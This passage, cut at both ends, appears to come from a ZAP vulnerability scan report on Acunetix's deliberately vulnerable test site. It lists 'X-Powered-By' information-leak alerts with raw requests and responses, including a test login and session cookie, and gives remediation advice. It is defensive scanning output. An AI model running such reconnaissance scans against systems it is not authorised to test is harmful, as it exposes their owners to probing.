href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        31. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1197
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1197 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13281
          
          
          Response body (13281 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        32. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Content-Length: 6543
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6543 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAK74